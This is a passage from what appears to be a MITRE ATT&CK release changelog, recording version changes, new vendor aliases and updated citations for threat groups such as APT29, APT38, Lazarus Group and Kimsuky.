JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.(Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version4.05.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesForest Blizzard
aliasesFROZENLAKE
external_references{'source_name': 'FROZENLAKE', 'description': '(Citation: Leonard TAG 2023)'}
external_references{'source_name': 'Forest Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Leonard TAG 2023', 'description': 'Billy Leonard. (2023, April 19). Ukraine remains Russia’s biggest cyber focus in 2023. Retrieved March 1, 2024.', 'url': 'https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0016] APT29

Current version: 6.0

Version changed from: 5.0 → 6.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-02 21:33:07.807000+00:002024-04-12 21:15:41.833000+00:00
x_mitre_version5.06.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesMidnight Blizzard
external_references{'source_name': 'Midnight Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
x_mitre_contributorsLiran Ravich, CardinalOps

[G0050] APT32

Current version: 3.0

Version changed from: 2.7 → 3.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-12 21:15:24.393000+00:002024-04-17 22:07:49.430000+00:00
x_mitre_version2.73.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesCanvas Cyclone
aliasesBISMUTH
external_references{'source_name': 'Canvas Cyclone', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'BISMUTH', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0064] APT33

Current version: 2.0

Version changed from: 1.4 → 2.0


Old Description
New Description
t1[APT33](https://attack.mitre.org/groups/G0064) is a suspectet1[APT33](https://attack.mitre.org/groups/G0064) is a suspecte
>d Iranian threat group that has carried out operations since>d Iranian threat group that has carried out operations since
> at least 2013. The group has targeted organizations across > at least 2013. The group has targeted organizations across 
>multiple industries in the United States, Saudi Arabia, and >multiple industries in the United States, Saudi Arabia, and 
>South Korea, with a particular interest in the aviation and >South Korea, with a particular interest in the aviation and 
>energy sectors. (Citation: FireEye APT33 Sept 2017) (Citatio>energy sectors.(Citation: FireEye APT33 Sept 2017)(Citation:
>n: FireEye APT33 Webinar Sept 2017)> FireEye APT33 Webinar Sept 2017)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-08 22:07:25.123000+00:002024-04-11 16:06:34.700000+00:00
description[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.(Citation: FireEye APT33 Sept 2017)(Citation: FireEye APT33 Webinar Sept 2017)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.42.0
x_mitre_contributors[0]Dragos Threat IntelligenceDragos Threat Intelligence
iterable_item_added
STIX FieldOld valueNew Value
aliasesPeach Sandstorm
external_references{'source_name': 'Peach Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0082] APT38

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
New Description
t1[APT38](https://attack.mitre.org/groups/G0082) is a North Kot1[APT38](https://attack.mitre.org/groups/G0082) is a North Ko
>rean state-sponsored threat group that specializes in financ>rean state-sponsored threat group that specializes in financ
>ial cyber operations; it has been attributed to the Reconnai>ial cyber operations; it has been attributed to the Reconnai
>ssance General Bureau.(Citation: CISA AA20-239A BeagleBoyz A>ssance General Bureau.(Citation: CISA AA20-239A BeagleBoyz A
>ugust 2020) Active since at least 2014, [APT38](https://atta>ugust 2020) Active since at least 2014, [APT38](https://atta
>ck.mitre.org/groups/G0082) has targeted banks, financial ins>ck.mitre.org/groups/G0082) has targeted banks, financial ins
>titutions, casinos, cryptocurrency exchanges, SWIFT system e>titutions, casinos, cryptocurrency exchanges, SWIFT system e
>ndpoints, and ATMs in at least 38 countries worldwide. Signi>ndpoints, and ATMs in at least 38 countries worldwide. Signi
>ficant operations include the 2016 Bank of Bangladesh heist,>ficant operations include the 2016 Bank of Bangladesh heist,
> during which [APT38](https://attack.mitre.org/groups/G0082)> during which [APT38](https://attack.mitre.org/groups/G0082)
> stole $81 million, as well as attacks against Bancomext (20> stole $81 million, as well as attacks against Bancomext (Ci
>18) and Banco de Chile (2018); some of their attacks have be>tation: FireEye APT38 Oct 2018) and Banco de Chile (Citation
>en destructive.(Citation: CISA AA20-239A BeagleBoyz August 2>: FireEye APT38 Oct 2018); some of their attacks have been d
>020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North K>estructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)
>orea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under >(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea
>The Hood Blog 2017)  North Korean group definitions are know> Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The 
>n to have significant overlap, and some security researchers>Hood Blog 2017)  North Korean group definitions are known to
> report all North Korean state-sponsored cyber activity unde> have significant overlap, and some security researchers rep
>r the name [Lazarus Group](https://attack.mitre.org/groups/G>ort all North Korean state-sponsored cyber activity under th
>0032) instead of tracking clusters or subgroups.>e name [Lazarus Group](https://attack.mitre.org/groups/G0032
 >) instead of tracking clusters or subgroups.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-01-18 17:13:14.610000+00:002024-04-17 22:08:29.146000+00:00
description[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (Citation: FireEye APT38 Oct 2018) and Banco de Chile (Citation: FireEye APT38 Oct 2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.
x_mitre_version2.03.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesSapphire Sleet
aliasesCOPERNICIUM
external_references{'source_name': 'Sapphire Sleet', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'COPERNICIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0096] APT41

Current version: 4.0

Version changed from: 3.1 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-23 15:45:58.846000+00:002024-04-03 15:20:38.791000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version3.14.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesBrass Typhoon
aliasesBARIUM
external_references{'source_name': 'Brass Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'BARIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
x_mitre_contributorsNikita Rostovcev, Group-IB

[G0138] Andariel

Current version: 2.0

Version changed from: 1.0 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-11-30 22:51:40.270000+00:002024-01-08 21:55:29.570000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesPLUTONIUM
aliasesOnyx Sleet
external_references{'source_name': 'PLUTONIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Onyx Sleet', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G1012] CURIUM

Current version: 2.0

Version changed from: 1.0 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-12 13:21:41.276000+00:002024-04-17 22:09:00.876000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesCrimson Sandstorm
aliasesTA456
aliasesTortoise Shell
external_references{'source_name': 'Crimson Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Tortoise Shell', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'TA456', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)(Citation: Proofpoint TA456 Defense Contractor July 2021)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
external_references{'source_name': 'Proofpoint TA456 Defense Contractor July 2021', 'description': 'Miller, J. et. al. (2021, July 28). I Knew You Were Trouble: TA456 Targets Defense Contractor with Alluring Social Media Persona. Retrieved March 11, 2024.', 'url': 'https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media'}

[G0012] Darkhotel

Current version: 3.0

Version changed from: 2.1 → 3.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-17 20:21:44.687000+00:002024-01-08 20:27:56.707000+00:00
x_mitre_version2.13.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesZigzag Hail
external_references{'source_name': 'Zigzag Hail', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0035] Dragonfly

Current version: 4.0

Version changed from: 3.2 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-01 02:45:48.973000+00:002024-01-08 20:40:31.822000+00:00
x_mitre_version3.24.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesGhost Blizzard
aliasesBROMINE
external_references{'source_name': 'Ghost Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'BROMINE', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G1006] Earth Lusca

Current version: 2.0

Version changed from: 1.0 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-17 19:51:56.531000+00:002024-04-10 21:38:24.226000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesCharcoal Typhoon
aliasesCHROMIUM
aliasesControlX
external_references{'source_name': 'Charcoal Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'ControlX', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'CHROMIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023) (Citation: Recorded Future RedHotel August 2023)'}
external_references{'source_name': 'Recorded Future RedHotel August 2023', 'description': 'Insikt Group. (2023, August 8). RedHotel: A Prolific, Chinese State-Sponsored Group Operating at a Global Scale. Retrieved March 11, 2024.', 'url': 'https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0037] FIN6

Current version: 4.0

Version changed from: 3.3 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 03:50:17.471000+00:002024-01-08 22:13:27.588000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version3.34.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesTAAL
aliasesCamouflage Tempest
external_references{'source_name': 'TAAL', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Camouflage Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0046] FIN7

Current version: 4.0

Version changed from: 3.0 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-04 18:10:49.054000+00:002024-04-17 22:09:41.004000+00:00
x_mitre_version3.04.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesELBRUS
aliasesSangria Tempest
external_references{'source_name': 'ELBRUS', 'description': '(Citation: Microsoft Ransomware as a Service)'}
external_references{'source_name': 'Sangria Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
external_references{'source_name': 'Microsoft Ransomware as a Service', 'description': 'Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/'}

[G0117] Fox Kitten

Current version: 2.0

Version changed from: 1.1 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 03:53:37.888000+00:002024-01-08 22:00:34.410000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesRUBIDIUM
aliasesLemon Sandstorm
external_references{'source_name': 'RUBIDIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Lemon Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0093] GALLIUM

Current version: 4.0

Version changed from: 3.0 → 4.0


Old Description
New Description
t1[GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberet1[GALLIUM](https://attack.mitre.org/groups/G0093) is a cybere
>spionage group that has been active since at least 2012, pri>spionage group that has been active since at least 2012, pri
>marily targeting telecommunications companies, financial ins>marily targeting telecommunications companies, financial ins
>titutions, and government entities in Afghanistan, Australia>titutions, and government entities in Afghanistan, Australia
>, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, >, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, 
>Russia, and Vietnam. Security researchers have identified [G>Russia, and Vietnam. This group is particularly known for la
>ALLIUM](https://attack.mitre.org/groups/G0093) as a likely C>unching Operation Soft Cell, a long-term campaign targeting 
>hinese state-sponsored group, based in part on tools used an>telecommunications providers.(Citation: Cybereason Soft Cell
>d TTPs commonly associated with Chinese threat actors.(Citat> June 2019) Security researchers have identified [GALLIUM](h
>ion: Cybereason Soft Cell June 2019)(Citation: Microsoft GAL>ttps://attack.mitre.org/groups/G0093) as a likely Chinese st
>LIUM December 2019)(Citation: Unit 42 PingPull Jun 2022)>ate-sponsored group, based in part on tools used and TTPs co
 >mmonly associated with Chinese threat actors.(Citation: Cybe
 >reason Soft Cell June 2019)(Citation: Microsoft GALLIUM Dece
 >mber 2019)(Citation: Unit 42 PingPull Jun 2022)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-12 21:26:22.303000+00:002024-04-17 22:10:27.139000+00:00
description[GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022)[GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. This group is particularly known for launching Operation Soft Cell, a long-term campaign targeting telecommunications providers.(Citation: Cybereason Soft Cell June 2019) Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022)
external_references[1]['source_name']Operation Soft CellGranite Typhoon
external_references[1]['description'](Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft Threat Actor Naming July 2023)
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version3.04.0
aliases[1]Operation Soft CellGranite Typhoon
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0047] Gamaredon Group

Current version: 3.0

Version changed from: 2.1 → 3.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 04:29:39.915000+00:002023-12-04 18:11:02.073000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.13.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesAqua Blizzard
external_references{'source_name': 'Aqua Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0125] HAFNIUM

Current version: 2.0

Version changed from: 1.3 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-10 21:54:46.756000+00:002024-01-08 20:45:37.568000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.32.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesSilk Typhoon
external_references{'source_name': 'Silk Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0119] Indrik Spider

Current version: 4.0

Version changed from: 3.0 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-03 21:39:36.666000+00:002024-04-17 22:10:56.266000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version3.04.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesManatee Tempest
aliasesDEV-0243
external_references{'source_name': 'Manatee Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'DEV-0243', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0004] Ke3chang

Current version: 3.0

Version changed from: 2.0 → 3.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-07-22 18:52:32.762000+00:002024-01-08 21:47:14.257000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version2.03.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesNylon Typhoon
external_references{'source_name': 'Nylon Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0094] Kimsuky

Current version: 4.0

Version changed from: 3.1 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-27 20:08:25.814000+00:002024-04-17 22:11:50.321000+00:00
external_references[1]['source_name']ThalliumTHALLIUM
external_references[3]['source_name']STOLEN PENCILEmerald Sleet
external_references[3]['description'](Citation: Netscout Stolen Pencil Dec 2018)(Citation: Microsoft Threat Actor Naming July 2023)
x_mitre_version3.14.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesEmerald Sleet
aliasesTHALLIUM
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
iterable_item_removed
STIX FieldOld valueNew Value
aliasesSTOLEN PENCIL
aliasesThallium

[G1004] LAPSUS$

Current version: 2.0

Version changed from: 1.2 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-20 17:06:10.335000+00:002024-01-11 21:51:11.405000+00:00
x_mitre_version1.22.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesStrawberry Tempest
external_references{'source_name': 'Strawberry Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0032] Lazarus Group

Current version: 4.0

Version changed from: 3.2 → 4.0


Old Description
New Description
t1[Lazarus Group](https://attack.mitre.org/groups/G0032) is a t1[Lazarus Group](https://attack.mitre.org/groups/G0032) is a 
>North Korean state-sponsored cyber threat group that has bee>North Korean state-sponsored cyber threat group that has bee
>n attributed to the Reconnaissance General Bureau.(Citation:>n attributed to the Reconnaissance General Bureau.(Citation:
> US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Ko> US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Ko
>rean Cyber Groups September 2019) The group has been active >rean Cyber Groups September 2019) The group has been active 
>since at least 2009 and was reportedly responsible for the N>since at least 2009 and was reportedly responsible for the N
>ovember 2014 destructive wiper attack against Sony Pictures >ovember 2014 destructive wiper attack against Sony Pictures 
>Entertainment as part of a campaign named Operation Blockbus>Entertainment as part of a campaign named Operation Blockbus
>ter by Novetta. Malware used by [Lazarus Group](https://atta>ter by Novetta. Malware used by [Lazarus Group](https://atta
>ck.mitre.org/groups/G0032) correlates to other reported camp>ck.mitre.org/groups/G0032) correlates to other reported camp
>aigns, including Operation Flame, Operation 1Mission, Operat>aigns, including Operation Flame, Operation 1Mission, Operat
>ion Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novett>ion Troy, DarkSeoul, and Ten Days of Rain.(Citation: Novetta
>a Blockbuster)  North Korean group definitions are known to > Blockbuster)  North Korean group definitions are known to h
>have significant overlap, and some security researchers repo>ave significant overlap, and some security researchers repor
>rt all North Korean state-sponsored cyber activity under the>t all North Korean state-sponsored cyber activity under the 
> name [Lazarus Group](https://attack.mitre.org/groups/G0032)>name [Lazarus Group](https://attack.mitre.org/groups/G0032) 
> instead of tracking clusters or subgroups, such as [Andarie>instead of tracking clusters or subgroups, such as [Andariel
>l](https://attack.mitre.org/groups/G0138), [APT37](https://a>](https://attack.mitre.org/groups/G0138), [APT37](https://at
>ttack.mitre.org/groups/G0067), [APT38](https://attack.mitre.>tack.mitre.org/groups/G0067), [APT38](https://attack.mitre.o
>org/groups/G0082), and [Kimsuky](https://attack.mitre.org/gr>rg/groups/G0082), and [Kimsuky](https://attack.mitre.org/gro
>oups/G0094).   >ups/G0094).   
Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 19:01:41.451000+00:002024-04-11 16:06:34.699000+00:00
